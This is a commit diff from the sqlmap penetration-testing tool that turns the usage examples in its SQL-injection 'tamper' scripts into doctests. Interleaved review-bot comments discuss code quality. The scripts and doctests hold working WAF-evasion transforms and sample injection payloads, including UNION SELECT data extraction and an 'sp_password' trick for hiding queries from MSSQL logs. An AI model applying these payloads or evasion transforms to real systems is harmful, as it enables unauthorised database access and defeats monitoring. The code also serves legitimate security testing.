Another update for Issue #352 and a couple of fixes

This commit is contained in:
Miroslav Stampar 2013-03-13 21:57:09 +01:00
parent b35122a42c
commit 4cb378ce3e
38 changed files with 127 additions and 146 deletions


@ -736,7 +736,7 @@ def singleTimeLogMessage(message, level=logging.INFO, flag=None):
if flag is None:
flag = hash(message)
if flag not in kb.singleLogFlags:
if not conf.smokeTest and flag not in kb.singleLogFlags:
kb.singleLogFlags.add(flag)
logger.log(level, message)
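Review bot: The new guard on `if not conf.smokeTest and flag not in kb.singleLogFlags:` does more than relax deduplication: in smoke-test mode the message is never logged and the flag is never recorded, and nothing on the line says why. A one-line comment above it, e.g. `# stay silent during the smoke test so doctest output is not polluted`, would record the intent, if that is indeed the reason. Separately, `flag = hash(message)` keys the one-shot set on a hash, so two distinct messages whose hashes collide would share a flag; strings are hashable, so `flag = message` as the default removes that case at no cost. The enclosing function starts before this hunk.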


@ -41,8 +41,9 @@ failedTraceBack = None
def smokeTest():
"""
This will run the basic smoke testing of a program
Runs the basic smoke testing of a program
"""
retVal = True
count, length = 0, 0
@ -106,8 +107,9 @@ def adjustValueType(tagName, value):
def liveTest():
"""
This will run the test of a program against the live testing environment
Runs the test of a program against the live testing environment
"""
global failedItem
global failedParseOn
global failedTraceBack


@ -16,15 +16,14 @@ def tamper(payload, **kwargs):
"""
Replaces apostrophe character with its UTF-8 full width counterpart
Example:
* Input: AND '1'='1'
* Output: AND %EF%BC%871%EF%BC%87=%EF%BC%871%EF%BC%87
References:
* http://www.utf8-chartable.de/unicode-utf8-table.pl?start=65280&number=128
* http://lukasz.pilorz.net/testy/unicode_conversion/
* http://sla.ckers.org/forum/read.php?13,11562,11850
* http://lukasz.pilorz.net/testy/full_width_utf/index.phps
>>> tamper("1 AND '1'='1")
'1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'
"""
return payload.replace('\'', "%EF%BC%87") if payload else payload


@ -16,9 +16,8 @@ def tamper(payload, **kwargs):
"""
Replaces apostrophe character with its illegal double unicode counterpart
Example:
* Input: AND '1'='1'
* Output: AND %00%271%00%27=%00%271%00%27
>>> tamper("1 AND '1'='1")
'1 AND %00%271%00%27=%00%271'
"""
return payload.replace('\'', "%00%27") if payload else payload


@ -16,10 +16,6 @@ def tamper(payload, **kwargs):
"""
Appends encoded NULL byte character at the end of payload
Example:
* Input: AND 1=1
* Output: AND 1=1%00
Requirement:
* Microsoft Access
@ -29,6 +25,9 @@ def tamper(payload, **kwargs):
also possible
Reference: http://projects.webappsec.org/w/page/13246949/Null-Byte-Injection
>>> tamper('1 AND 1=1')
'1 AND 1=1%00'
"""
return "%s%%00" % payload if payload else payload


@ -18,9 +18,8 @@ def tamper(payload, **kwargs):
"""
Base64 all characters in a given payload
Example:
* Input: 1' AND SLEEP(5)#
* Output: MScgQU5EIFNMRUVQKDUpIw==
>>> tamper("1' AND SLEEP(5)#")
'MScgQU5EIFNMRUVQKDUpIw=='
"""
return base64.b64encode(payload) if payload else payload


@ -18,10 +18,6 @@ def tamper(payload, **kwargs):
"""
Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #'
Example:
* Input: 'A > B'
* Output: 'A NOT BETWEEN 0 AND B'
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
@ -33,6 +29,9 @@ def tamper(payload, **kwargs):
filter the greater than character
* The BETWEEN clause is SQL standard. Hence, this tamper script
should work against all (?) databases
>>> tamper('1 AND A > B--')
'1 AND A NOT BETWEEN 0 AND B--'
"""
retVal = payload


@ -19,10 +19,6 @@ def tamper(payload, **kwargs):
Replaces space character after SQL statement with a valid random blank character.
Afterwards replace character = with LIKE operator
Example:
* Input: SELECT id FROM users where id = 1
* Output: SELECT%09id FROM users where id LIKE 1
Requirement:
* Blue Coat SGOS with WAF activated as documented in
https://kb.bluecoat.com/index?page=content&id=FAQ2147
@ -32,12 +28,15 @@ def tamper(payload, **kwargs):
Notes:
* Useful to bypass Blue Coat's recommended WAF rule configuration
>>> tamper('SELECT id FROM users where id = 1')
'SELECT%09id FROM users where id LIKE 1'
"""
retVal = payload
if payload:
retVal = re.sub(r"(?i)(SELECT|UPDATE|INSERT|DELETE)\s+", r"\g<1>\t", payload)
retVal = re.sub(r"(?i)(SELECT|UPDATE|INSERT|DELETE)\s+", r"\g<1>%09", payload)
retVal = re.sub(r"\s*=\s*", " LIKE ", retVal)
return retVal
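Review bot: The rewritten line `retVal = re.sub(r"(?i)(SELECT|UPDATE|INSERT|DELETE)\s+", r"\g<1>%09", payload)` changes what the script emits at runtime (the literal text `%09` instead of a tab character), while the rest of this commit only touches docstrings and doctests, and neither the hunk nor the commit message says why. A short comment on that line giving the reason for emitting the already-encoded form, plus a mention in the commit message, would keep the change from reading as accidental. The function's signature and the start of its docstring are outside the hunk.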


@ -19,14 +19,13 @@ def tamper(payload, **kwargs):
Double url-encodes all characters in a given payload (not processing
already encoded)
Example:
* Input: SELECT FIELD FROM%20TABLE
* Output: %2553%2545%254c%2545%2543%2554%2520%2546%2549%2545%254c%2544%2520%2546%2552%254f%254d%2520%2554%2541%2542%254c%2545
Notes:
* Useful to bypass some weak web application firewalls that do not
double url-decode the request before processing it through their
ruleset
>>> tamper('SELECT FIELD FROM%20TABLE')
'%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545'
"""
retVal = payload
@ -37,7 +36,7 @@ def tamper(payload, **kwargs):
while i < len(payload):
if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits:
retVal += payload[i:i + 3]
retVal += '%%25%s' % payload[i + 1:i + 3]
i += 3
else:
retVal += '%%25%.2X' % ord(payload[i])
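Review bot: The docstring still says the script is "not processing already encoded" input, but the new line `retVal += '%%25%s' % payload[i + 1:i + 3]` does transform every existing `%XX` sequence into `%25XX`, as the new doctest for `FROM%20TABLE` also shows. The parenthetical in the summary should describe what now happens, e.g. `(already url-encoded %XX sequences are emitted as %25XX rather than encoded character by character)`. The `while` loop's start and the function's tail are outside this hunk.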


@ -19,10 +19,6 @@ def tamper(payload, **kwargs):
Url-encodes all characters in a given payload (not processing already
encoded)
Example:
* Input: SELECT FIELD FROM%20TABLE
* Output: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
@ -34,6 +30,9 @@ def tamper(payload, **kwargs):
url-decode the request before processing it through their ruleset
* The web server will anyway pass the url-decoded version behind,
hence it should work against any DBMS
>>> tamper('SELECT FIELD FROM%20TABLE')
'%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45'
"""
retVal = payload


@ -21,10 +21,6 @@ def tamper(payload, **kwargs):
Unicode-url-encodes non-encoded characters in a given payload (not
processing already encoded)
Example:
* Input: SELECT FIELD%20FROM TABLE
* Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045'
Requirement:
* ASP
* ASP.NET
@ -39,6 +35,9 @@ def tamper(payload, **kwargs):
* Useful to bypass weak web application firewalls that do not
unicode url-decode the request before processing it through their
ruleset
>>> tamper('SELECT FIELD%20FROM TABLE')
'%u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045'
"""
retVal = payload


@ -21,10 +21,6 @@ def tamper(payload, **kwargs):
"""
Replaces all occurances of operator equal ('=') with operator 'LIKE'
Example:
* Input: SELECT * FROM users WHERE id=1
* Output: SELECT * FROM users WHERE id LIKE 1
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
@ -34,6 +30,9 @@ def tamper(payload, **kwargs):
filter the equal character ('=')
* The LIKE operator is SQL standard. Hence, this tamper script
should work against all (?) databases
>>> tamper('SELECT * FROM users WHERE id=1')
'SELECT * FROM users WHERE id LIKE 1'
"""
def process(match):


@ -18,10 +18,6 @@ def tamper(payload, **kwargs):
"""
Replaces greater than operator ('>') with 'GREATEST' counterpart
Example:
* Input: 'A > B'
* Output: 'GREATEST(A, B + 1) = A'
Tested against:
* MySQL 4, 5.0 and 5.5
* Oracle 10g
@ -32,6 +28,9 @@ def tamper(payload, **kwargs):
filter the greater than character
* The GREATEST clause is a widespread SQL command. Hence, this
tamper script should work against majority of databases
>>> tamper('1 AND A > B')
'1 AND GREATEST(A,B+1)=A'
"""
retVal = payload


@ -23,10 +23,6 @@ def tamper(payload, **kwargs):
"""
Adds versioned MySQL comment before each keyword
Example:
* Input: value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa
* Output: value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)), NULL, NULL#/*!0AND 'QDWa'='QDWa
Requirement:
* MySQL < 5.1
@ -38,6 +34,9 @@ def tamper(payload, **kwargs):
back-end database management system is MySQL
* Used during the ModSecurity SQL injection challenge,
http://modsecurity.org/demo/challenge.html
>>> tamper("value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa")
"value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"
"""
def process(match):


@ -16,10 +16,6 @@ def tamper(payload, **kwargs):
"""
Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)'
Example:
* Input: IFNULL(1, 2)
* Output: IF(ISNULL(1), 2, 1)
Requirement:
* MySQL
* SQLite (possibly)
@ -31,6 +27,9 @@ def tamper(payload, **kwargs):
Notes:
* Useful to bypass very weak and bespoke web application firewalls
that filter the IFNULL() function
>>> tamper('IFNULL(1, 2)')
'IF(ISNULL(1),2,1)'
"""
if payload and payload.find("IFNULL") > -1:
@ -55,7 +54,7 @@ def tamper(payload, **kwargs):
if comma and end:
_ = payload[index + len("IFNULL("):comma]
__ = payload[comma + 1:end]
__ = payload[comma + 1:end].lstrip()
newVal = "IF(ISNULL(%s),%s,%s)" % (_, __, _)
payload = payload[:index] + newVal + payload[end + 1:]
else:
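Review bot: The two captured arguments are bound to `_` and `__` (`_ = payload[index + len("IFNULL("):comma]` and the rewritten `__ = payload[comma + 1:end].lstrip()`), names Python readers take to mean "discarded", yet both are consumed by `newVal = "IF(ISNULL(%s),%s,%s)" % (_, __, _)` on the next line. Descriptive names such as `first`/`second` would make that substitution readable without decoding which underscore is which. The enclosing block begins before this hunk and continues after it.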


@ -17,10 +17,6 @@ def tamper(payload, **kwargs):
"""
Embraces complete query with versioned comment
Example:
* Input: 1 AND 2>1--
* Output: 1 /*!30000AND 2>1*/--
Requirement:
* MySQL
@ -29,6 +25,11 @@ def tamper(payload, **kwargs):
Notes:
* Useful to bypass ModSecurity WAF/IDS
>>> import random
>>> random.seed(0)
>>> tamper('1 AND 2>1--')
'1 /*!30874AND 2>1*/--'
"""
retVal = payload
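Review bot: The doctest added here pins the `random.seed(0)` result to one exact string, `'1 /*!30874AND 2>1*/--'`, so it encodes not the script's contract but the sequence CPython's `random` module yields for that seed on the interpreter the author ran; a different interpreter, or a later change to `random`'s integer-drawing helpers, will fail the test while the code is still correct. The same applies to every other doctest in this commit that begins with `>>> random.seed(0)` (multiple spaces, random case, random comments, the space-to-dash/hash/morehash scripts and the three random-blank scripts). Asserting only the stable parts, e.g. that the result starts with `'1 /*!'` and ends with `'AND 2>1*/--'`, keeps the doctest deterministic without tying it to the generator; the cheaper alternative is a comment in the smoke-test runner recording the seed dependency. This hunk also adds `>>> import random` before the seed while several of the others rely on the module having imported `random` already; one form should be used throughout.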


@ -16,10 +16,6 @@ def tamper(payload, **kwargs):
"""
Embraces complete query with zero-versioned comment
Example:
* Input: 1 AND 2>1--
* Output: 1 /*!00000AND 2>1*/--
Requirement:
* MySQL
@ -28,6 +24,9 @@ def tamper(payload, **kwargs):
Notes:
* Useful to bypass ModSecurity WAF/IDS
>>> tamper('1 AND 2>1--')
'1 /*!00000AND 2>1*/--'
"""
retVal = payload


@ -20,15 +20,15 @@ def tamper(payload, **kwargs):
"""
Adds multiple spaces around SQL keywords
Example:
* Input: UNION SELECT
* Output: UNION SELECT
Notes:
* Useful to bypass very weak and bespoke web application firewalls
that has poorly written permissive regular expressions
Reference: https://www.owasp.org/images/7/74/Advanced_SQL_Injection.ppt
>>> random.seed(0)
>>> tamper('1 UNION SELECT foobar')
'1 UNION SELECT foobar'
"""
retVal = payload


@ -18,12 +18,12 @@ def tamper(payload, **kwargs):
Replaces predefined SQL keywords with representations
suitable for replacement (e.g. .replace("SELECT", "")) filters
Example:
* Input: 1 UNION SELECT 2--
* Output: 1 UNUNIONION SELSELECTECT 2--
Notes:
* Useful to bypass very weak custom filters
>>> random.seed(0)
>>> tamper('1 UNION SELECT 2--')
'1 UNIOUNIONN SELESELECTCT 2--'
"""
keywords = ("UNION", "SELECT", "INSERT", "UPDATE", "FROM", "WHERE")


@ -20,10 +20,6 @@ def tamper(payload, **kwargs):
"""
Adds a percentage sign ('%') infront of each character
Example:
* Input: SELECT FIELD FROM TABLE
* Output: %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E
Requirement:
* ASP
@ -34,6 +30,9 @@ def tamper(payload, **kwargs):
Notes:
* Useful to bypass weak and bespoke web application firewalls
>>> tamper('SELECT FIELD FROM TABLE')
'%S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E'
"""
if payload:


@ -20,10 +20,6 @@ def tamper(payload, **kwargs):
"""
Replaces each keyword character with random case value
Example:
* Input: INSERT
* Output: InsERt
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
@ -34,6 +30,11 @@ def tamper(payload, **kwargs):
* Useful to bypass very weak and bespoke web application firewalls
that has poorly written permissive regular expressions
* This tamper script should work against all (?) databases
>>> import random
>>> random.seed(0)
>>> tamper('INSERT')
'INseRt'
"""
retVal = payload


@ -16,7 +16,11 @@ __priority__ = PRIORITY.LOW
def tamper(payload, **kwargs):
"""
Add random comments to SQL keywords
Example: 'INSERT' becomes 'IN/**/S/**/ERT'
>>> import random
>>> random.seed(0)
>>> tamper('INSERT')
'I/**/N/**/SERT'
"""
retVal = payload


@ -16,13 +16,12 @@ def tamper(payload, **kwargs):
"""
Appends special crafted string
Example:
* Input: AND 1=1
* Output: AND 1=1 and '0having'='0having'
Notes:
* Useful for bypassing Imperva SecureSphere WAF
* Reference: http://seclists.org/fulldisclosure/2011/May/163
>>> tamper('1 AND 1=1')
"1 AND 1=1 and '0having'='0having'"
"""
return payload + " and '0having'='0having'" if payload else payload


@ -13,16 +13,15 @@ def tamper(payload, **kwargs):
"""
Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs
Example:
* Input: 1 AND 9227=9227--
* Output: 1 AND 9227=9227--sp_password
Requirement:
* MSSQL
Notes:
* Appending sp_password to the end of the query will hide it from T-SQL logs as a security measure
* Reference: http://websec.ca/kb/sql_injection
>>> tamper('1 AND 9227=9227-- ')
'1 AND 9227=9227-- sp_password'
"""
retVal = ""


@ -16,10 +16,6 @@ def tamper(payload, **kwargs):
"""
Replaces space character (' ') with comments '/**/'
Example:
* Input: SELECT id FROM users
* Output: SELECT/**/id/**/FROM/**/users
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
@ -28,6 +24,9 @@ def tamper(payload, **kwargs):
Notes:
* Useful to bypass weak and bespoke web application firewalls
>>> tamper('SELECT id FROM users')
'SELECT/**/id/**/FROM/**/users'
"""
retVal = payload


@ -17,20 +17,18 @@ def tamper(payload, **kwargs):
Replaces space character (' ') with a dash comment ('--') followed by
a random string and a new line ('\n')
Example:
* Input: 1 AND 9227=9227
* Output: 1--PTTmJopxdWJ%0AAND--cWfcVRPV%0A9227=9227
Requirement:
* MSSQL
* SQLite
Tested against:
Notes:
* Useful to bypass several web application firewalls
* Used during the ZeroNights SQL injection challenge,
https://proton.onsec.ru/contest/
>>> random.seed(0)
>>> tamper('1 AND 9227=9227')
'1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227'
"""
retVal = ""


@ -23,10 +23,6 @@ def tamper(payload, **kwargs):
Replaces space character (' ') with a pound character ('#') followed by
a random string and a new line ('\n')
Example:
* Input: 1 AND 9227=9227
* Output: 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227
Requirement:
* MySQL
@ -37,6 +33,10 @@ def tamper(payload, **kwargs):
* Useful to bypass several web application firewalls
* Used during the ModSecurity SQL injection challenge,
http://modsecurity.org/demo/challenge.html
>>> random.seed(0)
>>> tamper('1 AND 9227=9227')
'1%23nVNaVoPYeva%0AAND%23ngNvzqu%0A9227=9227'
"""
retVal = ""


@ -26,10 +26,6 @@ def tamper(payload, **kwargs):
Replaces space character (' ') with a pound character ('#') followed by
a random string and a new line ('\n')
Example:
* Input: 1 AND 9227=9227
* Output: 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227
Requirement:
* MySQL >= 5.1.13
@ -40,6 +36,10 @@ def tamper(payload, **kwargs):
* Useful to bypass several web application firewalls
* Used during the ModSecurity SQL injection challenge,
http://modsecurity.org/demo/challenge.html
>>> random.seed(0)
>>> tamper('1 AND 9227=9227')
'1%23ngNvzqu%0AAND%23nVNaVoPYeva%0A%23lujYFWfv%0A9227=9227'
"""
def process(match):


@ -22,10 +22,6 @@ def tamper(payload, **kwargs):
Replaces space character (' ') with a random blank character from a
valid set of alternate characters
Example:
* Input: SELECT id FROM users
* Output: SELECT%08id%02FROM%0Fusers
Requirement:
* Microsoft SQL Server
@ -35,6 +31,10 @@ def tamper(payload, **kwargs):
Notes:
* Useful to bypass several web application firewalls
>>> random.seed(0)
>>> tamper('SELECT id FROM users')
'SELECT%0Eid%0DFROM%07users'
"""
# ASCII table:


@ -14,16 +14,15 @@ def tamper(payload, **kwargs):
Replaces space character (' ') with a pound character ('#') followed by
a new line ('\n')
Example:
* Input: 1 AND 9227=9227
* Output: 1%23%0A9227=9227
Requirement:
* MSSQL
* MySQL
Notes:
* Useful to bypass several web application firewalls
>>> tamper('1 AND 9227=9227')
'1%23%0AAND%23%0A9227=9227'
"""
retVal = ""


@ -22,10 +22,6 @@ def tamper(payload, **kwargs):
Replaces space character (' ') with a random blank character from a
valid set of alternate characters
Example:
* Input: SELECT id FROM users
* Output: SELECT%0Bid%0BFROM%A0users
Requirement:
* MySQL
@ -34,6 +30,10 @@ def tamper(payload, **kwargs):
Notes:
* Useful to bypass several web application firewalls
>>> random.seed(0)
>>> tamper('SELECT id FROM users')
'SELECT%A0id%0BFROM%0Cusers'
"""
# ASCII table:


@ -21,10 +21,6 @@ def tamper(payload, **kwargs):
Replaces space character (' ') with a dash comment ('--') followed by
a new line ('\n')
Example:
* Input: 1 AND 9227=9227
* Output: 1--%0AAND--%0A9227=9227
Requirement:
* MySQL
* MSSQL
@ -33,6 +29,9 @@ def tamper(payload, **kwargs):
Notes:
* Useful to bypass several web application firewalls.
>>> tamper('1 AND 9227=9227')
'1--%0AAND--%0A9227=9227'
"""
retVal = ""


@ -16,14 +16,13 @@ def tamper(payload, **kwargs):
"""
Replaces space character (' ') with plus ('+')
Example:
* Input: SELECT id FROM users
* Output: SELECT+id+FROM+users
Notes:
* Is this any useful? The plus get's url-encoded by sqlmap engine
invalidating the query afterwards
* This tamper script works against all databases
>>> tamper('SELECT id FROM users')
'SELECT+id+FROM+users'
"""
retVal = payload


@ -19,10 +19,6 @@ def tamper(payload, **kwargs):
Replaces space character (' ') with a random blank character from a
valid set of alternate characters
Example:
* Input: SELECT id FROM users
* Output: SELECT\rid\tFROM\nusers
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
@ -31,6 +27,10 @@ def tamper(payload, **kwargs):
Notes:
* Useful to bypass several web application firewalls
>>> random.seed(0)
>>> tamper('SELECT id FROM users')
'SELECT%0Did%0DFROM%0Ausers'
"""
# ASCII table:


@ -16,9 +16,8 @@ def tamper(payload, **kwargs):
"""
Replaces UNION ALL SELECT with UNION SELECT
Example:
* Input: -1 UNION ALL SELECT
* Output: -1 UNION SELECT
>>> tamper('-1 UNION ALL SELECT')
'-1 UNION SELECT'
"""
return payload.replace("UNION ALL SELECT", "UNION SELECT") if payload else payload


@ -19,15 +19,14 @@ def tamper(payload, **kwargs):
Replaces quote character (') with a multi-byte combo %bf%27 together with
generic comment at the end (to make it work)
Example:
* Input: 1' AND 1=1
* Output: 1%bf%27 AND 1=1--%20
Notes:
* Useful for bypassing magic_quotes/addslashes feature
Reference:
* http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string
>>> tamper("1' AND 1=1")
'1%bf%27 AND 1=1-- '
"""
retVal = payload


@ -22,10 +22,6 @@ def tamper(payload, **kwargs):
"""
Encloses each non-function keyword with versioned MySQL comment
Example:
* Input: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))#
* Output: 1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS*//*!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#
Requirement:
* MySQL
@ -35,6 +31,9 @@ def tamper(payload, **kwargs):
Notes:
* Useful to bypass several web application firewalls when the
back-end database management system is MySQL
>>> tamper('1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))#')
'1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS*//*!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#'
"""
def process(match):


@ -23,10 +23,6 @@ def tamper(payload, **kwargs):
"""
Encloses each keyword with versioned MySQL comment
Example:
* Input: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#
* Output: 1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS*//*!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#
Requirement:
* MySQL >= 5.1.13
@ -36,6 +32,9 @@ def tamper(payload, **kwargs):
Notes:
* Useful to bypass several web application firewalls when the
back-end database management system is MySQL
>>> tamper('1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#')
'1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS*//*!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#'
"""
def process(match):